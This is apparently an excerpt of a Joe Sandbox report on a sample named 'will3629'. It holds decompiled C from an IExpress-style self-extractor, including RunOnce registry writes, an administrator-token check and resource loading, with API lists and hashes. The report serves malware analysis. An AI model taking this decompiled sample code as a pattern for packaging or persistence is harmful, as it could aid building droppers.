                                                						if( *0xac88c0 != 0) {
                                                							E00AC1680(0xac87a0, 0x104, 0xac88c0);
                                                						}
                                                						 *0xaca288(_v12);
                                                						 *_v20();
                                                						if(_t71 != _t71) {
                                                							asm("int 0x29");
                                                						}
                                                					}
                                                					FreeLibrary(_t66);
                                                					_t85 =  *0xac87a0; // 0x0
                                                					return 0 | _t85 != 0x00000000;
                                                				} else {
                                                					GetTempPathA(0x104, 0xac88c0);
                                                					_t61 = 0xac88c0;
                                                					_t4 =  &(_t61[1]); // 0xac88c1
                                                					_t65 = _t4;
                                                					do {
                                                						_t42 =  *_t61;
                                                						_t61 =  &(_t61[1]);
                                                					} while (_t42 != 0);
                                                					_t5 = _t61 - _t65 + 0xac88c0; // 0x1591181
                                                					_t44 = CharPrevA(0xac88c0, _t5);
                                                					_v8 = _t44;
                                                					if( *_t44 == 0x5c &&  *(CharPrevA(0xac88c0, _t44)) != 0x3a) {
                                                						 *_v8 = 0;
                                                					}
                                                					goto L10;
                                                				}
                                                			}




























                                                0x00ac4234
                                                0x00ac423c
                                                0x00ac4240
                                                0x00ac43b2
                                                0x00ac43b7
                                                0x00ac43c0
                                                0x00000000
                                                0x00ac43c5
                                                0x00ac424c
                                                0x00ac4252
                                                0x00ac4257
                                                0x00ac43a4
                                                0x00ac43a5
                                                0x00ac43ab
                                                0x00000000
                                                0x00ac43ab
                                                0x00ac4263
                                                0x00ac4269
                                                0x00ac426e
                                                0x00000000
                                                0x00000000
                                                0x00ac427a
                                                0x00ac4280
                                                0x00ac4285
                                                0x00000000
                                                0x00000000
                                                0x00ac428d
                                                0x00ac4293
                                                0x00ac42e6
                                                0x00ac42e9
                                                0x00ac42ef
                                                0x00ac42f4
                                                0x00ac42f7
                                                0x00ac4300
                                                0x00ac4307
                                                0x00ac430e
                                                0x00ac4315
                                                0x00ac431c
                                                0x00ac4322
                                                0x00ac4326
                                                0x00ac432d
                                                0x00ac432d
                                                0x00ac432f
                                                0x00ac4334
                                                0x00ac4343
                                                0x00ac4349
                                                0x00ac434d
                                                0x00ac4354
                                                0x00ac4354
                                                0x00ac435d
                                                0x00ac436e
                                                0x00ac436e
                                                0x00ac437d
                                                0x00ac4383
                                                0x00ac4387
                                                0x00ac438e
                                                0x00ac438e
                                                0x00ac4387
                                                0x00ac4391
                                                0x00ac4399
                                                0x00000000
                                                0x00ac4295
                                                0x00ac429f
                                                0x00ac42a5
                                                0x00ac42aa
                                                0x00ac42aa
                                                0x00ac42ad
                                                0x00ac42ad
                                                0x00ac42af
                                                0x00ac42b0
                                                0x00ac42b6
                                                0x00ac42c2
                                                0x00ac42c8
                                                0x00ac42ce
                                                0x00ac42e4
                                                0x00ac42e4
                                                0x00000000
                                                0x00ac42ce

                                                APIs
                                                • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 00AC4236
                                                • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 00AC424C
                                                • GetProcAddress.KERNEL32(00000000,000000C3), ref: 00AC4263
                                                • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 00AC427A
                                                • GetTempPathA.KERNEL32(00000104,00AC88C0,?,00000001), ref: 00AC429F
                                                • CharPrevA.USER32(00AC88C0,01591181,?,00000001), ref: 00AC42C2
                                                • CharPrevA.USER32(00AC88C0,00000000,?,00000001), ref: 00AC42D6
                                                • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00AC4391
                                                • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00AC43A5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true
                                                • Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd
                                                Similarity
                                                • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                • API String ID: 1865808269-1731843650
                                                • Opcode ID: fd4bdf7a4b2ad4e1a3efc8ca98b1f842582a136c7484f6d2bd4ecee97d669b3d
                                                • Instruction ID: 4cb8734feb4861e320f3d97338addeb863c851808a44edd220527399c2dbd9c5
                                                • Opcode Fuzzy Hash: fd4bdf7a4b2ad4e1a3efc8ca98b1f842582a136c7484f6d2bd4ecee97d669b3d
                                                • Instruction Fuzzy Hash: AC41E375A00244AFD7119BA0DCA9FBE7BB4FB49384F07056DE941A7351CB788C028765
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 94%
                                                			E00AC2773(CHAR* __ecx, char* _a4) {
                                                				signed int _v8;
                                                				char _v268;
                                                				char _v269;
                                                				CHAR* _v276;
                                                				int _v280;
                                                				void* _v284;
                                                				int _v288;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t23;
                                                				intOrPtr _t34;
                                                				int _t45;
                                                				int* _t50;
                                                				CHAR* _t52;
                                                				CHAR* _t61;
                                                				char* _t62;
                                                				int _t63;
                                                				CHAR* _t64;
                                                				signed int _t65;
                                                
                                                				_t52 = __ecx;
                                                				_t23 =  *0xac8004; // 0xc32e3ded
                                                				_v8 = _t23 ^ _t65;
                                                				_t62 = _a4;
                                                				_t50 = 0;
                                                				_t61 = __ecx;
                                                				_v276 = _t62;
                                                				 *((char*)(__ecx)) = 0;
                                                				if( *_t62 != 0x23) {
                                                					_t63 = 0x104;
                                                					goto L14;
                                                				} else {
                                                					_t64 = _t62 + 1;
                                                					_v269 = CharUpperA( *_t64);
                                                					_v276 = CharNextA(CharNextA(_t64));
                                                					_t63 = 0x104;
                                                					_t34 = _v269;
                                                					if(_t34 == 0x53) {
                                                						L14:
                                                						GetSystemDirectoryA(_t61, _t63);
                                                						goto L15;
                                                					} else {
                                                						if(_t34 == 0x57) {
                                                							GetWindowsDirectoryA(_t61, 0x104);
                                                							goto L16;
                                                						} else {
                                                							_push(_t52);
                                                							_v288 = 0x104;
                                                							E00AC1781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
                                                							_t59 = 0x104;
                                                							E00AC658A( &_v268, 0x104, _v276);
                                                							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
                                                								L16:
                                                								_t59 = _t63;
                                                								E00AC658A(_t61, _t63, _v276);
                                                							} else {
                                                								if(RegQueryValueExA(_v284, 0xac1140, 0,  &_v280, _t61,  &_v288) == 0) {
                                                									_t45 = _v280;
                                                									if(_t45 != 2) {
                                                										L9:
                                                										if(_t45 == 1) {
                                                											goto L10;
                                                										}
                                                									} else {
                                                										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
                                                											_t45 = _v280;
                                                											goto L9;
                                                										} else {
                                                											_t59 = 0x104;
                                                											E00AC1680(_t61, 0x104,  &_v268);
                                                											L10:
                                                											_t50 = 1;
                                                										}
                                                									}
                                                								}
                                                								RegCloseKey(_v284);
                                                								L15:
                                                								if(_t50 == 0) {
                                                									goto L16;
                                                								}
                                                							}
                                                						}
                                                					}
                                                				}
                                                				return E00AC6CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
                                                			}























                                                0x00ac2773
                                                0x00ac277e
                                                0x00ac2785
                                                0x00ac278a
                                                0x00ac278d
                                                0x00ac2790
                                                0x00ac2792
                                                0x00ac2798
                                                0x00ac279d
                                                0x00ac28b2
                                                0x00000000
                                                0x00ac27a3
                                                0x00ac27a3
                                                0x00ac27af
                                                0x00ac27c2
                                                0x00ac27c8
                                                0x00ac27cd
                                                0x00ac27d5
                                                0x00ac28b7
                                                0x00ac28b9
                                                0x00000000
                                                0x00ac27db
                                                0x00ac27dd
                                                0x00ac28aa
                                                0x00000000
                                                0x00ac27e3
                                                0x00ac27e3
                                                0x00ac27ec
                                                0x00ac27f8
                                                0x00ac2803
                                                0x00ac280b
                                                0x00ac2831
                                                0x00ac28c3
                                                0x00ac28c9
                                                0x00ac28cd
                                                0x00ac2837
                                                0x00ac285a
                                                0x00ac285c
                                                0x00ac2865
                                                0x00ac2892
                                                0x00ac2895
                                                0x00000000
                                                0x00000000
                                                0x00ac2867
                                                0x00ac2878
                                                0x00ac288c
                                                0x00000000
                                                0x00ac287a
                                                0x00ac2880
                                                0x00ac2885
                                                0x00ac2897
                                                0x00ac2899
                                                0x00ac2899
                                                0x00ac2878
                                                0x00ac2865
                                                0x00ac28a0
                                                0x00ac28bf
                                                0x00ac28c1
                                                0x00000000
                                                0x00000000
                                                0x00ac28c1
                                                0x00ac2831
                                                0x00ac27dd
                                                0x00ac27d5
                                                0x00ac28e5

                                                APIs
                                                • CharUpperA.USER32(C32E3DED,00000000,00000000,00000000), ref: 00AC27A8
                                                • CharNextA.USER32(0000054D), ref: 00AC27B5
                                                • CharNextA.USER32(00000000), ref: 00AC27BC
                                                • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00AC2829
                                                • RegQueryValueExA.ADVAPI32(?,00AC1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00AC2852
                                                • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00AC2870
                                                • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00AC28A0
                                                • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 00AC28AA
                                                • GetSystemDirectoryA.KERNEL32 ref: 00AC28B9
                                                Strings
                                                • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 00AC27E4
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true
                                                • Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd
                                                Similarity
                                                • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                • API String ID: 2659952014-2428544900
                                                • Opcode ID: 12017c1698dfd6f57188d12e8dc39a40b2ed38717500c49e852b6bc14db4f811
                                                • Instruction ID: 58c84ac022ee1bb85c894f776b010617c7f226b57c166220b5d55640ed563a15
                                                • Opcode Fuzzy Hash: 12017c1698dfd6f57188d12e8dc39a40b2ed38717500c49e852b6bc14db4f811
                                                • Instruction Fuzzy Hash: EC41A071A0012CAFDB24DB649C85FFA7BBDEB65700F0640ADF549E2101DB708E868FA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 62%
                                                			E00AC2267() {
                                                				signed int _v8;
                                                				char _v268;
                                                				char _v836;
                                                				void* _v840;
                                                				int _v844;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t19;
                                                				intOrPtr _t33;
                                                				void* _t38;
                                                				intOrPtr* _t42;
                                                				void* _t45;
                                                				void* _t47;
                                                				void* _t49;
                                                				signed int _t51;
                                                
                                                				_t19 =  *0xac8004; // 0xc32e3ded
                                                				_t20 = _t19 ^ _t51;
                                                				_v8 = _t19 ^ _t51;
                                                				if( *0xac8530 != 0) {
                                                					_push(_t49);
                                                					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
                                                						_push(_t38);
                                                						_v844 = 0x238;
                                                						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
                                                							_push(_t47);
                                                							memset( &_v268, 0, 0x104);
                                                							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                								E00AC658A( &_v268, 0x104, 0xac1140);
                                                							}
                                                							_push("C:\Users\alfons\AppData\Local\Temp\IXP002.TMP\");
                                                							E00AC171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
                                                							_t42 =  &_v836;
                                                							_t45 = _t42 + 1;
                                                							_pop(_t47);
                                                							do {
                                                								_t33 =  *_t42;
                                                								_t42 = _t42 + 1;
                                                							} while (_t33 != 0);
                                                							RegSetValueExA(_v840, "wextract_cleanup2", 0, 1,  &_v836, _t42 - _t45 + 1);
                                                						}
                                                						_t20 = RegCloseKey(_v840);
                                                						_pop(_t38);
                                                					}
                                                					_pop(_t49);
                                                				}
                                                				return E00AC6CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
                                                			}



















                                                0x00ac2272
                                                0x00ac2277
                                                0x00ac2279
                                                0x00ac2283
                                                0x00ac2289
                                                0x00ac22ab
                                                0x00ac22b1
                                                0x00ac22c4
                                                0x00ac22e0
                                                0x00ac22e6
                                                0x00ac22f5
                                                0x00ac230d
                                                0x00ac231c
                                                0x00ac231c
                                                0x00ac2321
                                                0x00ac233a
                                                0x00ac2342
                                                0x00ac2348
                                                0x00ac234b
                                                0x00ac234c
                                                0x00ac234c
                                                0x00ac234e
                                                0x00ac234f
                                                0x00ac236e
                                                0x00ac236e
                                                0x00ac237a
                                                0x00ac2380
                                                0x00ac2380
                                                0x00ac2381
                                                0x00ac2381
                                                0x00ac238f

                                                APIs
                                                • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 00AC22A3
                                                • RegQueryValueExA.ADVAPI32(?,wextract_cleanup2,00000000,00000000,?,?,00000001), ref: 00AC22D8
                                                • memset.MSVCRT ref: 00AC22F5
                                                • GetSystemDirectoryA.KERNEL32 ref: 00AC2305
                                                • RegSetValueExA.ADVAPI32(?,wextract_cleanup2,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 00AC236E
                                                • RegCloseKey.ADVAPI32(?), ref: 00AC237A
                                                Strings
                                                • wextract_cleanup2, xrefs: 00AC227C, 00AC22CD, 00AC2363
                                                • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 00AC232D
                                                • C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00AC2321
                                                • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00AC2299
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true
                                                • Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd
                                                Similarity
                                                • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup2
                                                • API String ID: 3027380567-3029760535
                                                • Opcode ID: 6df449cc12e3839dfde420eb74999ec4ab355823f00f85ed156b94ebd75742a0
                                                • Instruction ID: 019eb7a1a91fdbd93ad0e7508b8aae06a8718b072ffddc46cf72e1ef0999182f
                                                • Opcode Fuzzy Hash: 6df449cc12e3839dfde420eb74999ec4ab355823f00f85ed156b94ebd75742a0
                                                • Instruction Fuzzy Hash: 3431E171A0021CBBCB21DB64DC49FEBBB7CFB54740F0601ADB50DAA041EA74AB89CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 87%
                                                			E00AC3100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                				void* _t8;
                                                				void* _t11;
                                                				void* _t15;
                                                				struct HWND__* _t16;
                                                				struct HWND__* _t33;
                                                				struct HWND__* _t34;
                                                
                                                				_t8 = _a8 - 0xf;
                                                				if(_t8 == 0) {
                                                					if( *0xac8590 == 0) {
                                                						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
                                                						 *0xac8590 = 1;
                                                					}
                                                					L13:
                                                					return 0;
                                                				}
                                                				_t11 = _t8 - 1;
                                                				if(_t11 == 0) {
                                                					L7:
                                                					_push(0);
                                                					L8:
                                                					EndDialog(_a4, ??);
                                                					L9:
                                                					return 1;
                                                				}
                                                				_t15 = _t11 - 0x100;
                                                				if(_t15 == 0) {
                                                					_t16 = GetDesktopWindow();
                                                					_t33 = _a4;
                                                					E00AC43D0(_t33, _t16);
                                                					SetDlgItemTextA(_t33, 0x834,  *0xac8d4c);
                                                					SetWindowTextA(_t33, "lega");
                                                					SetForegroundWindow(_t33);
                                                					_t34 = GetDlgItem(_t33, 0x834);
                                                					 *0xac88b8 = GetWindowLongA(_t34, 0xfffffffc);
                                                					SetWindowLongA(_t34, 0xfffffffc, E00AC30C0);
                                                					return 1;
                                                				}
                                                				if(_t15 != 1) {
                                                					goto L13;
                                                				}
                                                				if(_a12 != 6) {
                                                					if(_a12 != 7) {
                                                						goto L9;
                                                					}
                                                					goto L7;
                                                				}
                                                				_push(1);
                                                				goto L8;
                                                			}









                                                0x00ac3108
                                                0x00ac310b
                                                0x00ac31b7
                                                0x00ac31ca
                                                0x00ac31d0
                                                0x00ac31d0
                                                0x00ac31da
                                                0x00000000
                                                0x00ac31da
                                                0x00ac3111
                                                0x00ac3114
                                                0x00ac3136
                                                0x00ac3136
                                                0x00ac3138
                                                0x00ac313b
                                                0x00ac3141
                                                0x00000000
                                                0x00ac3143
                                                0x00ac3116
                                                0x00ac311b
                                                0x00ac314b
                                                0x00ac3151
                                                0x00ac3158
                                                0x00ac316a
                                                0x00ac3176
                                                0x00ac317d
                                                0x00ac318b
                                                0x00ac319e
                                                0x00ac31a3
                                                0x00000000
                                                0x00ac31ad
                                                0x00ac3120
                                                0x00000000
                                                0x00000000
                                                0x00ac312a
                                                0x00ac3134
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00ac3134
                                                0x00ac312c
                                                0x00000000

                                                APIs
                                                • EndDialog.USER32(?,00000000), ref: 00AC313B
                                                • GetDesktopWindow.USER32 ref: 00AC314B
                                                • SetDlgItemTextA.USER32(?,00000834), ref: 00AC316A
                                                • SetWindowTextA.USER32(?,lega), ref: 00AC3176
                                                • SetForegroundWindow.USER32(?), ref: 00AC317D
                                                • GetDlgItem.USER32(?,00000834), ref: 00AC3185
                                                • GetWindowLongA.USER32(00000000,000000FC), ref: 00AC3190
                                                • SetWindowLongA.USER32(00000000,000000FC,00AC30C0), ref: 00AC31A3
                                                • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 00AC31CA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true
                                                • Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd
                                                Similarity
                                                • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                • String ID: lega
                                                • API String ID: 3785188418-245445314
                                                • Opcode ID: 6de05b0f4ef8ab707b7b770d46e2b65fe77855905992b2247f6860cf63bb82a7
                                                • Instruction ID: 0b2894a9262e559836ffbb5ef0a5e36dfc200da8844c443c25dd8f9b8c9c51d8
                                                • Opcode Fuzzy Hash: 6de05b0f4ef8ab707b7b770d46e2b65fe77855905992b2247f6860cf63bb82a7
                                                • Instruction Fuzzy Hash: 2D110632204225BFDF11DFA4AC0CFAA3A64FB5A724F0B8718F815951E0DBB58A43D746
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 91%
                                                			E00AC18A3(void* __edx, void* __esi) {
                                                				signed int _v8;
                                                				short _v12;
                                                				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                				char _v20;
                                                				long _v24;
                                                				void* _v28;
                                                				void* _v32;
                                                				void* __ebx;
                                                				void* __edi;
                                                				signed int _t23;
                                                				long _t45;
                                                				void* _t49;
                                                				int _t50;
                                                				void* _t52;
                                                				signed int _t53;
                                                
                                                				_t51 = __esi;
                                                				_t49 = __edx;
                                                				_t23 =  *0xac8004; // 0xc32e3ded
                                                				_v8 = _t23 ^ _t53;
                                                				_t25 =  *0xac8128; // 0x2
                                                				_t45 = 0;
                                                				_v12 = 0x500;
                                                				_t50 = 2;
                                                				_v16.Value = 0;
                                                				_v20 = 0;
                                                				if(_t25 != _t50) {
                                                					L20:
                                                					return E00AC6CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
                                                				}
                                                				if(E00AC17EE( &_v20) != 0) {
                                                					_t25 = _v20;
                                                					if(_v20 != 0) {
                                                						 *0xac8128 = 1;
                                                					}
                                                					goto L20;
                                                				}
                                                				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
                                                					goto L20;
                                                				}
                                                				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
                                                					L17:
                                                					CloseHandle(_v28);
                                                					_t25 = _v20;
                                                					goto L20;
                                                				} else {
                                                					_push(__esi);
                                                					_t52 = LocalAlloc(0, _v24);
                                                					if(_t52 == 0) {
                                                						L16:
                                                						_pop(_t51);
                                                						goto L17;
                                                					}
                                                					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
                                                						L15:
                                                						LocalFree(_t52);
                                                						goto L16;
                                                					} else {
                                                						if( *_t52 <= 0) {
                                                							L14:
                                                							FreeSid(_v32);
                                                							goto L15;
                                                						}
                                                						_t15 = _t52 + 4; // 0x4
                                                						_t50 = _t15;
                                                						while(EqualSid( *_t50, _v32) == 0) {
                                                							_t45 = _t45 + 1;
                                                							_t50 = _t50 + 8;
                                                							if(_t45 <  *_t52) {
                                                								continue;
                                                							}
                                                							goto L14;
                                                						}
                                                						 *0xac8128 = 1;
                                                						_v20 = 1;
                                                						goto L14;
                                                					}
                                                				}
                                                			}


















                                                0x00ac18a3
                                                0x00ac18a3
                                                0x00ac18ab
                                                0x00ac18b2
                                                0x00ac18b5
                                                0x00ac18be
                                                0x00ac18c0
                                                0x00ac18c6
                                                0x00ac18c7
                                                0x00ac18ca
                                                0x00ac18cf
                                                0x00ac19c9
                                                0x00ac19d8
                                                0x00ac19d8
                                                0x00ac18df
                                                0x00ac19b8
                                                0x00ac19bd
                                                0x00ac19bf
                                                0x00ac19bf
                                                0x00000000
                                                0x00ac19bd
                                                0x00ac18fa
                                                0x00000000
                                                0x00000000
                                                0x00ac1912
                                                0x00ac19aa
                                                0x00ac19ad
                                                0x00ac19b3
                                                0x00000000
                                                0x00ac1927
                                                0x00ac1927
                                                0x00ac1932
                                                0x00ac1936
                                                0x00ac19a9
                                                0x00ac19a9
                                                0x00000000
                                                0x00ac19a9
                                                0x00ac194c
                                                0x00ac19a2
                                                0x00ac19a3
                                                0x00000000
                                                0x00ac196e
                                                0x00ac1970
                                                0x00ac1999
                                                0x00ac199c
                                                0x00000000
                                                0x00ac199c
                                                0x00ac1972
                                                0x00ac1972
                                                0x00ac1975
                                                0x00ac1984
                                                0x00ac1985
                                                0x00ac198a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00ac198c
                                                0x00ac1991
                                                0x00ac1996
                                                0x00000000
                                                0x00ac1996
                                                0x00ac194c

                                                APIs
                                                  • Part of subcall function 00AC17EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00AC18DD), ref: 00AC181A
                                                  • Part of subcall function 00AC17EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00AC182C
                                                  • Part of subcall function 00AC17EE: AllocateAndInitializeSid.ADVAPI32(00AC18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00AC18DD), ref: 00AC1855
                                                  • Part of subcall function 00AC17EE: FreeSid.ADVAPI32(?,?,?,?,00AC18DD), ref: 00AC1883
                                                  • Part of subcall function 00AC17EE: FreeLibrary.KERNEL32(00000000,?,?,?,00AC18DD), ref: 00AC188A
                                                • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 00AC18EB
                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00AC18F2
                                                • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 00AC190A
                                                • GetLastError.KERNEL32 ref: 00AC1918
                                                • LocalAlloc.KERNEL32(00000000,?,?), ref: 00AC192C
                                                • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 00AC1944
                                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00AC1964
                                                • EqualSid.ADVAPI32(00000004,?), ref: 00AC197A
                                                • FreeSid.ADVAPI32(?), ref: 00AC199C
                                                • LocalFree.KERNEL32(00000000), ref: 00AC19A3
                                                • CloseHandle.KERNEL32(?), ref: 00AC19AD
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true
                                                • Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd
                                                Similarity
                                                • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                • String ID:
                                                • API String ID: 2168512254-0
                                                • Opcode ID: 9def0377b14b0a0fb6fff235680b501469a2ed76523e837ab9ce522b2b20ae85
                                                • Instruction ID: 95a075f12a10dad26ced824fc0a8830d35776cb32a64f1105890cf88a3e49e2a
                                                • Opcode Fuzzy Hash: 9def0377b14b0a0fb6fff235680b501469a2ed76523e837ab9ce522b2b20ae85
                                                • Instruction Fuzzy Hash: 23313971A00209AFDB20DFE5DC98EBFBBB8FF15344F120429E646E2151DB309906CB62
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 82%
                                                			E00AC468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
                                                				long _t4;
                                                				void* _t11;
                                                				CHAR* _t14;
                                                				void* _t15;
                                                				long _t16;
                                                
                                                				_t14 = __ecx;
                                                				_t11 = __edx;
                                                				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
                                                				_t16 = _t4;
                                                				if(_t16 <= _a4 && _t11 != 0) {
                                                					if(_t16 == 0) {
                                                						L5:
                                                						return 0;
                                                					}
                                                					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
                                                					if(_t15 == 0) {
                                                						goto L5;
                                                					}
                                                					__imp__memcpy_s(_t11, _a4, _t15, _t16);
                                                					FreeResource(_t15);
                                                					return _t16;
                                                				}
                                                				return _t4;
                                                			}








                                                0x00ac4699
                                                0x00ac469b
                                                0x00ac46a9
                                                0x00ac46af
                                                0x00ac46b4
                                                0x00ac46bc
                                                0x00ac46f9
                                                0x00000000
                                                0x00ac46f9
                                                0x00ac46d9
                                                0x00ac46dd
                                                0x00000000
                                                0x00000000
                                                0x00ac46e5
                                                0x00ac46ef
                                                0x00000000
                                                0x00ac46f5
                                                0x00ac46ff

                                                APIs
                                                • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00AC46A0
                                                • SizeofResource.KERNEL32(00000000,00000000,?,00AC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00AC46A9
                                                • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00AC46C3
